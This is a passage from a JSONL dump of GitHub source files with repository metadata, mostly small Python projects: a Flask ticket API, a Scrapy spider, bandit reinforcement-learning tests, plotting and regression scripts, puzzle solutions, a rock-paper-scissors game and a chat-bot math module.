not ev.active:\n\t\t\t\tcontinue\n\n\t\t\tt = ev.recalc(cur)\n\t\t\tif t.reached:\n\t\t\t\tprint('[SCHEDULER] Raising event %d, %fs overdue' % (ev.id, abs(t.skew.total_seconds())))\n\t\t\t\tfor i in self.listeners:\n\t\t\t\t\ti(ev)\n\n\t\t\tif t.delta == 0:\n\t\t\t\tself.event_list.remove(ev)\n\t\t\telif next == None or t.delta < next:\n\t\t\t\tnext = t.delta\n\t\treturn next\n","repo_name":"kennylevinsen/autohome","sub_path":"scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33956414074","text":"\nfrom app.forms.department_form import DepartmentForm\nfrom app.forms.ticket_form import TicketForm\nfrom flask import Blueprint, jsonify, request\nfrom flask_login import login_required, current_user\nfrom app.models.department import Department\nfrom app.models.ticket import Ticket\nfrom .auth_routes import validation_errors_to_error_messages\nfrom app.models import db\n\n\ndepartment_routes = Blueprint('departments', __name__)\n\n\n# get all departments\n@department_routes.route('/', methods=['GET'])\n@login_required\ndef get_departments():\n all_departments = Department.query.order_by(Department.name.asc()).all()\n departments = []\n if (all_departments):\n for i in range(len(all_departments)):\n departments.append(all_departments[i].to_dict())\n for dept in departments:\n dept_tickets = []\n tickets = Ticket.query.filter_by(\n department_id=dept['id']).join(Department).all()\n for ticket in tickets:\n dept_tickets.append(ticket.to_dict())\n dept['tickets'] = dept_tickets\n return {'departments': departments}\n# edit department route\n\n\n@ department_routes.route('//edit', methods=['PUT'])\n@ login_required\ndef edit_department(id):\n department = Department.query.get(id)\n dept_tickets = Ticket.query.filter_by(\n department_id=id).join(Department).all()\n tickets = []\n if dept_tickets:\n for i in range(len(dept_tickets)):\n tickets.append(dept_tickets[i].to_dict())\n form = DepartmentForm()\n form['csrf_token'].data = request.cookies['csrf_token']\n if form.validate_on_submit():\n department.name = form.name.data.capitalize()\n db.session.commit()\n dict_dept = department.to_dict()\n dict_dept['tickets'] = tickets\n return dict_dept\n return {'errors': validation_errors_to_error_messages(form.errors)}, 401\n\n# get one department route\n\n\n@ department_routes.route('/', methods=['GET'])\n@ login_required\ndef get_one_department(id):\n dept = Department.query.get(id)\n dict_dept = dept.to_dict()\n dept_tickets = Ticket.query.filter_by(\n department_id=id).join(Department).all()\n tickets = []\n if dept_tickets:\n for i in range(len(dept_tickets)):\n tickets.append(dept_tickets[i].to_dict())\n dict_dept['tickets'] = tickets\n return dict_dept\n\n# delete department\n\n\n@ department_routes.route('//delete', methods=['DELETE'])\n@ login_required\ndef deleteDepartment(departmentId):\n dept = Department.query.filter_by(\n id=departmentId).first()\n\n db.session.delete(dept)\n db.session.commit()\n return dept.to_dict()\n\n# create department\n\n\n@ department_routes.route('/', methods=['POST'])\n@ login_required\ndef newDepartment():\n form = DepartmentForm()\n form['csrf_token'].data = request.cookies['csrf_token']\n if form.validate_on_submit():\n dept = Department(\n name=form.name.data.capitalize(),\n )\n db.session.add(dept)\n db.session.commit()\n return dept.to_dict()\n return {'errors': validation_errors_to_error_messages(form.errors)}, 401\n\n\n# GET tickets of a department\n@ department_routes.route('//tickets')\n@ login_required\ndef getTicket(departmentId):\n allTickets = Ticket.query.order_by(Ticket.id.asc()).filter_by(\n department_id=departmentId).join(Department).all()\n tickets = []\n if(allTickets):\n for i in range(len(allTickets)):\n tickets.append(allTickets[i].to_dict())\n return {'tickets': tickets}\n\n\n# ADD A TICKET TO A Department\n@ department_routes.route('//user//tickets', methods=['POST'])\n@ login_required\ndef newTicket(departmentId, userId):\n form = TicketForm()\n form['csrf_token'].data = request.cookies['csrf_token']\n if form.validate_on_submit():\n ticket = Ticket(\n item_name=form.item_name.data.capitalize(),\n location=form.location.data,\n description=form.description.data.capitalize(),\n department_id=departmentId,\n owner_id=userId)\n db.session.add(ticket)\n db.session.commit()\n return ticket.to_dict()\n return {'errors': validation_errors_to_error_messages(form.errors)}, 401\n","repo_name":"DylanWelzel/Kostko-Connect","sub_path":"app/api/departments.py","file_name":"departments.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"24428404384","text":"import numpy as np\r\na=[]\r\nz=100000\r\nfor i in range(90000,z-1):\r\n \r\n for j in range (i+1,z):\r\n i2=i*i\r\n j2=j*j\r\n n1= pow((i2+j2), 0.5)\r\n if n1%1==0:\r\n a.append(i2)\r\n a.append(j2)\r\n print(i)\r\na=np.array(a) \r\nnp.save(r'C:\\Users\\1\\Desktop\\example_1.npy', a)\r\nb=[]\r\nfor i in range(1,2*z):\r\n b.append(i*i)\r\nnp.save(r'C:\\Users\\1\\Desktop\\example_2.npy', b)\r\n","repo_name":"orby-tech/-","sub_path":"create_i*i_of numbers.py","file_name":"create_i*i_of numbers.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35491551345","text":"# coding=utf-8\n\nimport sys\nimport datetime\nimport os\nimport shutil\n\n\ndef copy_so():\n src = so_copy_path + \"\\\\\" + project_name + \".so\"\n dst = so_release_path + \"\\\\\" + baseline + \"\\\\\" + product_name + \".so\"\n if not os.path.exists(src):\n print(\"未上传so文件,请上传so文件\")\n return 1\n shutil.copy(src, dst)\n return 0\n\n\nif __name__ == '__main__':\n product_name = sys.argv[1]\n project_name = sys.argv[2]\n\n so_copy_path = \"D:\\\\D:\\SO_RELEASE\"\n so_release_path = \"\\\\\\\\10.250.115.51\\\\APK_Release_Version\\\\03-product\\\\{0}\\\\{1}\".format(product_name, project_name)\n\n baseline = datetime.datetime.now().strftime(\"%Y.%m.%d_%H.%M\")\n\n exit_code = copy_so()\n\n if exit_code == 1:\n print(\"so发布失败!!!\")\n sys.exit(1)\n\n print(\"SO发布成功,发布地址为:{0}\".format(so_release_path + \"\\\\\" + baseline))\n\n\n\n","repo_name":"AndrewChan1988/PythonScriptForWork","sub_path":"ApkAutoIntegration/so_release.py","file_name":"so_release.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39381608846","text":"# _*_ coding:utf-8 _*_\n#GVIM 添加汉字注释\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nimport scrapy\nfrom ..items import TestScrapyItem\n\nclass test1Spider(scrapy.Spider):\n name ='test_scrapy' #新建爬虫\n start_urls=['http://bj.ganji.com/fang1/chanyang/'] #定义初始连接\n\n def parse(self,response):\n test=TestScrapyItem()\n title_list=response.xpath(\".//div[@class='f-list-item ']/dl/dd[1]/a/text()\").extract()\n money_list=response.xpath(\".//div[@class='f-list-item ']/dl/dd[5]/div[1]/span[1]/text()\").extract()\n for i in range(0,len(title_list)):\n test['title']=title_list[i]\n test['money']=money_list[i]\n yield test\n\n","repo_name":"peterbanban/RentalInformation","sub_path":"test_scrapy/spiders/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42226299899","text":"import unittest\n\nfrom bandit import *\n\n\nclass TestMultiarmBandits(unittest.TestCase):\n \"\"\"\n A class for testing multiarm bandit\n \"\"\"\n\n def test_single_bandit(self) -> None:\n \"\"\"\n Testing a single bandit.\n \"\"\"\n test_mean = 1.0\n test_span = 3.0\n test_len = 1000\n\n test_bandit = Bandit(test_mean, test_span)\n test_rewards = [test_bandit.pull_leaver() for _ in range(test_len)]\n\n plt.plot(test_rewards, label='rewards')\n plt.plot((test_mean + test_span) * np.ones(test_len),\n linestyle='--', color='red')\n plt.plot((test_mean - test_span) * np.ones(test_len),\n linestyle='--', color='red')\n\n plt.show()\n\n def test_environment(self) -> None:\n \"\"\"\n Testing bandits' environment. \n \"\"\"\n test_env_size = 5\n test_bandits = [Bandit(i ** 2, i) for i in range(test_env_size)]\n test_env = BanditsEnvironment(test_bandits)\n test_len = 1000\n\n selected_bandit = 4\n test_rewards = [test_env.take_action(\n selected_bandit) for _ in range(test_len)]\n\n plt.plot(test_rewards, label='rewards')\n plt.plot((selected_bandit ** 2 + selected_bandit) *\n np.ones(test_len), linestyle='--', color='r')\n plt.plot((selected_bandit ** 2 - selected_bandit) *\n np.ones(test_len), linestyle='--', color='r')\n\n plt.show()\n\n test_rewards = [test_env.take_action(\n random.randint(0, 4)) for _ in range(test_len)]\n test_mean = sum(test_rewards) / test_len\n\n print(\"TEST MEAN = \", test_mean)\n\n def test_decision_policies(self) -> None:\n \"\"\"\n Testing decision policies.\n \"\"\"\n test_q = [1, 2, 3, 2, 1]\n test_len = 1000\n\n plt.subplot(3, 1, 1)\n plt.plot([GreedyPolicy.action(q=test_q) for _ in range(test_len)])\n plt.subplot(3, 1, 2)\n plt.plot([RandomPolicy.action(q=test_q) for _ in range(test_len)])\n plt.subplot(3, 1, 3)\n plt.plot([EpsGreedyPolicy.action(q=test_q, eps=0.1)\n for _ in range(test_len)])\n\n plt.show()\n\n def test_system(self) -> None:\n\n BANDITS_NO = 5\n ATTEMPTS_NO = 10000\n\n bandits = [Bandit(10 * (random.random() - 0.5), 5 *\n random.random()) for _ in range(BANDITS_NO)]\n sys = System(bandits)\n\n # *** 1. zadatak ***\n # Razlog manjeg nagiba jeste što smanjivanjem epsilon vrijednosti smanjujemo eksploraciju i držimo se\n # eksploatacije, te u tom slučaju kriva će biti bliža \"optimalnoj\".\n # Prikazujemo i grafik konvergencije, koji pokazuje suštinu epsilon greedy politike.\n\n print('*** 1. zadatak ***')\n\n test_eps = [0.7, 0.4, 0.1, 0.01]\n\n for eps in test_eps:\n q, q_evol, old_bandit_mean = sys.run_system(\n eps=eps, ATTEMPTS_NO=ATTEMPTS_NO)\n plotter = ConvergencePlot(\n q_evol=q_evol, eps=0.1, ATTEMPTS_NO=ATTEMPTS_NO)\n plotter.plot(env=sys.env)\n\n # *** 2. zadatak ***\n # Naučeno Q vs epsilon = 0.\n\n print('*** 2. zadatak ***')\n\n test_eps = [0.1, 0.0]\n\n for eps in test_eps:\n q, q_evol, old_bandit_mean = sys.run_system(\n eps=eps, ATTEMPTS_NO=ATTEMPTS_NO)\n\n # *** 3. zadatak ***\n # Šta ako su karakteristike bandita promjenljive u vremenu?\n # Definišimo zakon promjene srednjih vrijednosti (može biti stohastičke ili determinističke prirode).\n # U tom slučaju ima smisla davati veću težinu trenutnim nagradama\n # kako bi se pokušala pronaći trenutno optimalna akcija.\n # Stoga se zadaje težinski faktor ALPHA,\n # koji je već implementiran i u nestacionarnom slučaju.\n # Takođe je potrebno izmijeniti implementaciju klase BanditEnvironment\n # kako bismo dodali mogućnost mijenjanja okoline.\n\n print('*** 3. zadatak ***')\n\n bandits = [Bandit(10 * (random.random() - 0.5), 5 *\n random.random()) for _ in range(BANDITS_NO)]\n sys = System(bandits, stationary=False)\n CHANGE_AT = [4000, 6000, 9000]\n q, q_evol, old_bandit_mean = sys.run_system(\n eps=0.1, CHANGE_AT=CHANGE_AT)\n\n # *** 4. zadatak ***\n # Konvergencija Q vrijednosti ka srednjoj vrijednosti bandita. U ovom slučaju\n # uzimamo prethodni sistem koji je stohastičke prirode, te ćemo dobiti\n # ponašanje da Q vrijednosti pokušavaju konvergirati ka srednjoj vrijednosti.\n\n print('*** 4. zadatak ***')\n plotter = ConvergencePlot(\n q_evol=q_evol, eps=0.1, ATTEMPTS_NO=ATTEMPTS_NO)\n plotter.plot(env=sys.env, CHANGE_AT=CHANGE_AT,\n old_bandit_mean=old_bandit_mean)\n\n\ndef main() -> None:\n unittest.main()\n\n\nif __name__ == '__main__':\n print(\"Hi! I am testing these bandits!\")\n","repo_name":"usernamenenad/Reinforcement-Learning-Course","sub_path":"domaci1/src/tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4977,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42510581873","text":"import io\nimport os\n\nfrom wellcadformats.arraydata import WAF, WAI\nfrom wellcadformats.curvedata import WAW\n\nfrom wellcadformats.wa import Comments\n\n__version__ = '0.1'\n\n\nclass UnknownFormat(IOError):\n pass\n\n\ndef read(file_object, fmt=None):\n if os.path.isfile(str(file_object)):\n fmt = os.path.splitext(file_object)[1][1:]\n file_object = open(file_object, 'r')\n read_functions = {\n 'waf': WAF,\n 'wai': WAI,\n 'waw': lambda fobj: WAW(file_obj=fobj),\n 'wca': WCA\n }\n fmt = fmt.lower()\n print('fmt: {}'.format(fmt))\n print('file_object: {}'.format(file_object))\n return read_functions[fmt](file_object)\n\n\n\nclass MultipleExport(object):\n def __init__(self, path=None):\n self.datasets = []\n if not path is None:\n self.read(path)\n\n def read(filename):\n try:\n dset = formats.read(fn)\n self.datasets.append(dset)\n except formats.UnknownFormat:\n pass\n self.refresh()\n\n def readpath(path):\n fns = glob.glob(os.path.join(path, '*.w??'))\n self.readfiles(fns)\n \n def readfiles(*fns):\n for fn in fns:\n self.read(fn)\n\n def refresh(self):\n import pandas as pd\n df = pandas.DataFrame()\n for dset in self.datasets:\n if isinstance(dset, WAW):\n self.waw_datasets.append(dset)\n for i, dset in enumerate(self.waw_datasets):\n \n if not index_key in indices:\n indices[index_key] = 1\n else:\n indices[index_key] += 1\n\n\n\nclass WCA(object):\n def __init__(self, file_object):\n self.file_object = file_object\n self.reload(file_object)\n \n\n def open(self, log_name):\n for fn in self.contents.keys():\n if fn.startswith(log_name):\n return read(self.contents[fn], fmt=os.path.splitext(fn)[1][1:])\n\n def seek(self, n=0):\n for file_object in self.contents.values():\n file_object.seek(n)\n \n def reload(self, file_object):\n inner_files = {}\n current_log = None\n for i, line in enumerate(file_object):\n if line.startswith('~LOG:'):\n if current_log:\n inner_files[current_log].seek(0)\n current_log = line.split(':')[1].strip()\n inner_files[current_log] = io.StringIO()\n else:\n if current_log:\n inner_files[current_log].write(line)\n self.contents = inner_files","repo_name":"kinverarity1/wellcadformats","sub_path":"wellcadformats/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70502053853","text":"import h5py\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.integrate as integrate\nfrom scipy.integrate import simps\nfrom matplotlib import gridspec\nimport statistics\nfrom array import *\nfrom scipy.interpolate import interp1d\nfrom numpy import diagonal\n\nlight_time = \"light_time.h5\"\nperiod = 25796\n\nwith h5py.File(light_time, \"r\") as f:\n # List all groups\n print(\"Keys: %s\" % f.keys())\n LC_key = list(f.keys())[0]\n phase_key = list(f.keys())[1]\n time_key = list(f.keys())[2]\n\n # Get the data\n LC = np.array(list(f[LC_key]))\n LC = LC[:,::-1]\n phase = np.array(list(f[phase_key]))\n time = np.array(list(f[time_key]))/period\n\n#print(LC.shape, time.shape)\n\n# LC = LC[2580:,:]\n# time=time[2580:]\n\n####### getting diagonal LC ##################\nLC = LC[2580:,:]\ninit_ph = np.arange(0,1,1./52.)\nLC_int = np.empty((512,512))\nLC_diag = np.empty((len(time[2580:3437]),len(phase)))\nfor ti in range(len(time[2580:3437])):\n if ti%100 == 0:\n print('%' + str(50/67.63 + ti/len(time)) + '...')\n if ti == 3437-2600:\n print('Almost there...')\n LC_dummy = LC[ti:ti+52,:]\n for ph in range(len(phase)):\n dummy = interp1d(init_ph, LC_dummy[:,ph], fill_value=\"extrapolate\")\n LC_int[:,ph] = dummy(phase)\n LC_diag[ti] = diagonal(LC_int)\n\nLC = LC_diag.copy()\ntime=time[2580:3437]\n\n# average\n\nLC_ave = np.zeros((len(phase),))\nfor ph in range(len(phase)):\n LC_dumb = simps(LC[:,ph], x=time)/(66.62-50.0)\n LC_ave[ph] = LC_dumb\n\nnorm_const = np.max( LC_ave)\nprint(norm_const)\n\nLC_data = LC #2063\ndata_var = []\ndata_var_dummy = np.empty(512)\nfor dat in range(len(phase)):\n data_var_dummy = statistics.pstdev(LC_data[:,dat])\n data_var = np.append(data_var,data_var_dummy)\n####################LC mesh##############################\nline_a = 64.2\n\nfig,ax1 = plt.subplots(1,figsize=(4.5,10))\ngs = gridspec.GridSpec(2, 1, height_ratios=[2, 1])\nax1 = fig.add_subplot(111)\nax1 = plt.subplot(gs[1])#, sharex = ax0)\nax0 = plt.subplot(gs[0], sharex = ax1)\n\nax0.vlines(0.23, ymin=50.0, ymax=67.63, colors='red', linestyles='dashed', label='1', linewidth=1.5)\nax0.vlines(0.29, ymin=50.0, ymax=67.63, colors='red', linestyles='dashed', label='2', linewidth=1.5)\nax0.vlines(0.36, ymin=50.0, ymax=67.63, colors='red', linestyles='dashed', label='3', linewidth=1.5)\n#ax0.hlines(57, xmin=0.0, xmax=1.0, colors='white', linestyles='dashed', label='a', linewidth=1.5)\n#ax0.hlines(66.15, xmin=0.0, xmax=1.0, colors='white', linestyles='dashed', label='b', linewidth=1.5)\nax0.hlines(line_a, xmin=0.0, xmax=1.0, colors='white', linestyles='dashed', label='a', linewidth=1.5)\nax0.text(0.18, 53, '1', fontsize=15, color='red')\nax0.text(0.24, 53, '2', fontsize=15, color='red')\nax0.text(0.31, 53, '3', fontsize=15, color='red')\nax0.text(0.1, line_a+0.1, 'a', fontsize=15, color='white')\n\nim = ax0.pcolormesh(phase,time,LC,cmap='jet', vmax=0.25, vmin=0)\nax0.set_ylim(ymin=50, ymax= 66.62)\ncax = fig.add_axes([0.125, 0.89, 0.77, 0.01]) \ncbar = fig.colorbar(im, orientation='horizontal', cax = cax)\ncbar.set_ticks([0, 0.5*norm_const, norm_const, 1.5*norm_const, 2*norm_const])\ncbar.set_ticklabels([0,0.5,1,1.5,2])\ncax.xaxis.set_ticks_position('top')\nax0.set_ylabel('Time [number of periods]',fontsize=15)\n\ntime_slice = int((3437-2580)*(line_a-50)/(66.62-50)) # int(3489*56/67.67)\n\nax1.plot(phase, LC[time_slice,:], color='darkorange', label='line a', linewidth=2.0)\nax1.plot(phase, LC_ave, label='average', color='black', linewidth=1.0, linestyle='-')\nax1.set_ylim(ymin = 0.0, ymax = 0.2)\nax1.set_yticks([0.25*norm_const, 0.5*norm_const, 0.75*norm_const, norm_const, 1.25*norm_const])\nax1.set_yticklabels([0.25, 0.5, 0.75, 1.0, 1.25])\n\nax1.fill_between(phase, (LC_ave-data_var), (LC_ave+data_var), alpha=0.15, facecolor='blue', label='std deviation')\n\nax1.set_xlabel('Phase', fontsize=15)\nax1.set_ylabel('Normalized Flux',fontsize=15)\nax1.legend(loc='upper left')#, bbox_to_anchor=(-0.01, 1.02))\nax1.set_xlim(xmin = 0.0, xmax = 1.0)\nplt.subplots_adjust(hspace=0)\nplt.setp(ax0.get_xticklabels(), visible=False)\n\nplt.savefig('LCs_v3_diag-50.png', bbox_inches='tight', dpi=300)\nplt.show()","repo_name":"icandac/pulsar_intra-pulse_variability","sub_path":"LCs-mapA.py","file_name":"LCs-mapA.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30012575387","text":"\npi_digits = [3,1,4,1,5,9,2,6,5,3,5,8,9,7,9]\ndef pilish_string(txt, digit_idx = 0):\n if len(txt) == 0 or digit_idx >= len(pi_digits):\n return \"\"\n tarLen = pi_digits[digit_idx]\n if len(txt) >= tarLen:\n temp = pilish_string(txt[tarLen:], digit_idx + 1)\n if len(temp) == 0:\n return txt[:tarLen]\n else:\n return txt[:tarLen] + \" \" + temp\n else:\n return txt + txt[-1] * (tarLen - len(txt))\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"sHJmjMcZPiCsEujk6_23.py","file_name":"sHJmjMcZPiCsEujk6_23.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31263089227","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 26 10:40:35 2016\n\n@author: AbreuLastra_Work\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\n\nloansData = pd.read_csv('loansData.csv')\n\n# Droping missing observations\nloansData.dropna(inplace=True)\n\n# Cleaning the variable Interest.Rate, removing percentage point. \ncleanInterestRate = loansData['Interest.Rate'].map(lambda x: round(float(x.rstrip('%')) / 100, 4))\nloansData['Interest.Rate'] = cleanInterestRate\n\n# Setting Home.Ownership\n#loansData['Home_Ownership_ord'] = pd.Categorical(loansData['Home.Ownership']).labels\n# base case mortgate\ndummies = pd.get_dummies(loansData['Home.Ownership'],drop_first=True)\nloansData['Own_other'] = dummies['OTHER']\nloansData['Own_own'] = dummies['OWN']\nloansData['Own_rent'] = dummies['RENT']\n\nloansData['Int_inc_other'] = loansData['Own_other'] * loansData['Monthly.Income']\nloansData['Int_inc_own'] = loansData['Own_own'] * loansData['Monthly.Income']\nloansData['Int_inc_rent'] = loansData['Own_rent'] * loansData['Monthly.Income']\n\n# Setting the dependent variable \ny = loansData['Interest.Rate']\n\n# Setting different matrixes for independent variables\n\nX_1 = loansData['Monthly.Income']\nX_2 = loansData[['Monthly.Income', 'Own_other', 'Own_own', 'Own_rent']]\nX_3 = loansData[['Monthly.Income', 'Own_other', 'Own_own', 'Own_rent', 'Int_inc_other', 'Int_inc_own', 'Int_inc_rent']]\n# fit an OLS model\n\nX_1 = sm.add_constant(X_1) \nest_1 = sm.OLS(y,X_1).fit()\n\n\nprint (est_1.summary())\n\nX_2 = sm.add_constant(X_2) \nest_2 = sm.OLS(y,X_2).fit()\n\n\nprint (est_2.summary())\n\nX_3 = sm.add_constant(X_3) \nest_3 = sm.OLS(y,X_3).fit()\n\n\nprint (est_3.summary())","repo_name":"abreulastra/2_lesson_5_2","sub_path":"multivariate.py","file_name":"multivariate.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33221075670","text":"#A palindromic number reads the same both ways. The largest palindrome made from the product of two 2-digit numbers is 9009 = 91 × 99.\r\n#Find the largest palindrome made from the product of two 3-digit numbers.\r\n\r\ndef create_list(a):\r\n#function to convert integer values into list\r\n a = str(a)\r\n xyz = []\r\n for i in a:\r\n i = int(i)\r\n xyz.append(i)\r\n return xyz \r\nfor i in range(900009,998001):\r\n#iterating between the highest possible integer gotten by multiplying two 3_digit numbers and an arbitrary value.\r\n#the range between these values must contain multiple palindromic numbers\r\n\r\n x = create_list(i)\r\n if x[0] == x[5] and x[1] == x[4] and x[2]== x[3]:\r\n b = ''\r\n for i in x:\r\n b += str(i)\r\n b = int(b)\r\n c = 999\r\n while b%c != 0 and c>=100:\r\n c = c-1\r\n if b/c < 1000:\r\n print(c,b)\r\n","repo_name":"premota/mathematical-problems","sub_path":"palindromic problem.py","file_name":"palindromic problem.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38573113119","text":"#User function Template for python3\n\nclass Solution:\n def longestCommonSubstr(self, S1, S2, n, m):\n # code here\n\n dp =[[0]*(m+1) for _ in range(n+1)]\n \n for i in range(n+1):\n dp[i][0]=0\n \n for j in range(m+1):\n dp[0][j]=0\n \n maxi =0\n \n for i1 in range(1,n+1):\n for i2 in range(1,m+1):\n \n if S1[i1-1]==S2[i2-1]:\n dp[i1][i2] = 1+dp[i1-1][i2-1]\n maxi=max(maxi, dp[i1][i2])\n else:\n dp[i1][i2] =0\n \n return maxi\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\nif __name__=='__main__':\n t=int(input())\n for _ in range(t):\n n,m = input().strip().split(\" \")\n n,m = int(n), int(m)\n S1 = input().strip()\n S2 = input().strip()\n \n \n ob=Solution()\n print(ob.longestCommonSubstr(S1, S2, n, m))\n# } Driver Code Ends","repo_name":"iamheavymetalx7/LeetCode-Submissions","sub_path":"Longest Common Substring - GFG/longest-common-substring.py","file_name":"longest-common-substring.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"39502166487","text":"#Rock Paper Scissors game\r\n\r\nimport random\r\nimport time\r\n\r\nprint(\"Welcome to Rock Paper Scissors!\")\r\ntime.sleep(2)\r\nprint(\"\\nRules:\\n Game is best 2 out of 3\\n Type R for Rock, P for Paper, and S for Scissors\")\r\ntime.sleep(2)\r\n\r\nturns_left = 3\r\nuser_score = 0\r\ncomputer_score = 0\r\n\r\nwhile turns_left > 0 and user_score < 2 and computer_score < 2:\r\n \r\n comp_answer = random.randint(1,3)\r\n ## 1=R, 2=P, 3=S\r\n user_answer = input(\"\\nPick [R]ock, [P]aper, or [S]cissors: \")\r\n\r\n ##user wins scenarios\r\n if user_answer == \"R\" and comp_answer == 3:\r\n print(\"\\nComputer picks Scissors...Rock smashes scissors, YOU WIN!\")\r\n user_score = user_score + 1\r\n turns_left = turns_left + 1\r\n elif user_answer == \"P\" and comp_answer == 1:\r\n print(\"\\nComputer picks Rock...Paper covers Rock, YOU WIN!\")\r\n user_score = user_score + 1\r\n turns_left = turns_left + 1\r\n elif user_answer == \"S\" and comp_answer == 2:\r\n print(\"\\nComputer picks Paper...Scissors cuts Paper, YOU WIN!\")\r\n user_score = user_score + 1\r\n turns_left = turns_left + 1\r\n ##user loses scenarios\r\n elif user_answer == \"R\" and comp_answer == 2:\r\n print(\"\\nComputer picks Paper...Paper covers Rock, you lose :(\")\r\n computer_score = computer_score + 1\r\n turns_left = turns_left + 1\r\n elif user_answer == \"P\" and comp_answer == 3:\r\n print(\"\\nComputer picks Scissors...Scissors cuts Paper, you lose :(\")\r\n computer_score = computer_score + 1\r\n turns_left = turns_left + 1\r\n elif user_answer == \"S\" and comp_answer == 1:\r\n print(\"\\nComputer picks Rock...Rock smashes Scissors, you lose :(\")\r\n computer_score = computer_score + 1\r\n turns_left = turns_left + 1\r\n ##tie scenarios\r\n elif user_answer == \"R\" and comp_answer == 1:\r\n print(\"\\nComputer picks Rock, you tie...go again!\")\r\n elif user_answer == \"P\" and comp_answer == 2:\r\n print(\"\\nComputer picks Paper, you tie...go again!\")\r\n elif user_answer == \"S\" and comp_answer == 3:\r\n print(\"\\nComputer picks Scissors, you tie...go again!\")\r\n ##bad user input\r\n else:\r\n print(\"\\nPlease only type either R , P , or S to play!\")\r\n\r\nif user_score == 2:\r\n print(\"\\nCONGRATULATIONS! You win :)\")\r\n\r\nif computer_score == 2:\r\n print(\"\\nThe computer beat you :( , run the program again and give it another go!\")\r\n\r\n \r\n\r\n","repo_name":"DarthCe/python-lessons","sub_path":"rock paper scissors game.py","file_name":"rock paper scissors game.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35597195620","text":"\"\"\"Math module for semicolon.\"\"\"\r\nimport math # Used by eval() in calc()\r\nimport multiprocessing # Used because of eval() in calc()\r\nfrom array import array # Used to get the primes\r\nfrom cmds import command # Command dictionary\r\nfrom string import ascii_lowercase, ascii_uppercase, digits\r\nfrom message import Message\r\n\r\n# Fetching prime list\r\nprimesData = open('data/primes', 'rb')\r\nprimes = array('I')\r\nprimes.fromstring(primesData.read())\r\nprimesData.close()\r\n\r\n\r\n@command('calc', __name__, help='Evaluate an expression, e.g. log(sin(pi))',\r\n usage='')\r\ndef calc_command(_):\r\n \"\"\"Wrapper for the calc command.\"\"\"\r\n r = calc(_['T'])\r\n if r is None:\r\n return Message('Over capacity')\r\n else:\r\n return Message(r)\r\n\r\n\r\n@command('calcb', __name__, help='Evaluate an expression (binary output).',\r\n usage='')\r\ndef calcb_command(_):\r\n \"\"\"Wrapper for the calc command (bin).\"\"\"\r\n r = calc(_['T'])\r\n if r is None:\r\n return Message('Over capacity')\r\n else:\r\n return Message(bin(r).replace('0b', ''))\r\n\r\n\r\n@command('calco', __name__, help='Evaluate an expression (octal output).',\r\n usage='')\r\ndef calco_command(_):\r\n \"\"\"Wrapper for the calc command (oct).\"\"\"\r\n r = calc(_['T'])\r\n if r is None:\r\n return Message('Over capacity')\r\n else:\r\n return Message(oct(r).replace('0o', ''))\r\n\r\n\r\n@command('calcx', __name__, help='Evaluate an expression (hex output).',\r\n usage='')\r\ndef calcx_command(_):\r\n \"\"\"Wrapper for the calc command (hex).\"\"\"\r\n r = calc(_['T'])\r\n if r is None:\r\n return Message('Over capacity')\r\n else:\r\n return Message(hex(r).replace('0x', ''))\r\n\r\n\r\n@command('prime', __name__, help='Return the Nth prime number (up to 1e7).',\r\n usage='')\r\ndef nthprime(_):\r\n \"\"\"Return Nth prime.\"\"\"\r\n try:\r\n l = list(map(int, _['P'][1:]))\r\n if max(l) > len(primes) or min(l) < 1:\r\n return Message('Over capacity')\r\n return Message(' '.join([str(primes[n - 1]) for n in l]))\r\n except:\r\n pass\r\n\r\n\r\n@command('isprm', __name__, help='Tell if N is a prime number (up to 3e16).',\r\n usage='')\r\ndef isprim(_):\r\n \"\"\"Wrapper for isPrime function.\"\"\"\r\n try:\r\n l = list(map(int, _['P'][1:]))\r\n except:\r\n return\r\n answers = []\r\n for x in l:\r\n r = isPrime(x)\r\n s = 'Over capacity' if r is None else str(r)\r\n if r and x <= primes[-1]:\r\n i = dicho(x, primes)\r\n pref = 'th'\r\n if i % 10 < 3 and (i // 10 % 10 != 1):\r\n pref = ('st', 'nd', 'rd')[i % 10]\r\n s += ' (' + str(i + 1) + pref + ')'\r\n answers.append(s)\r\n return Message(' 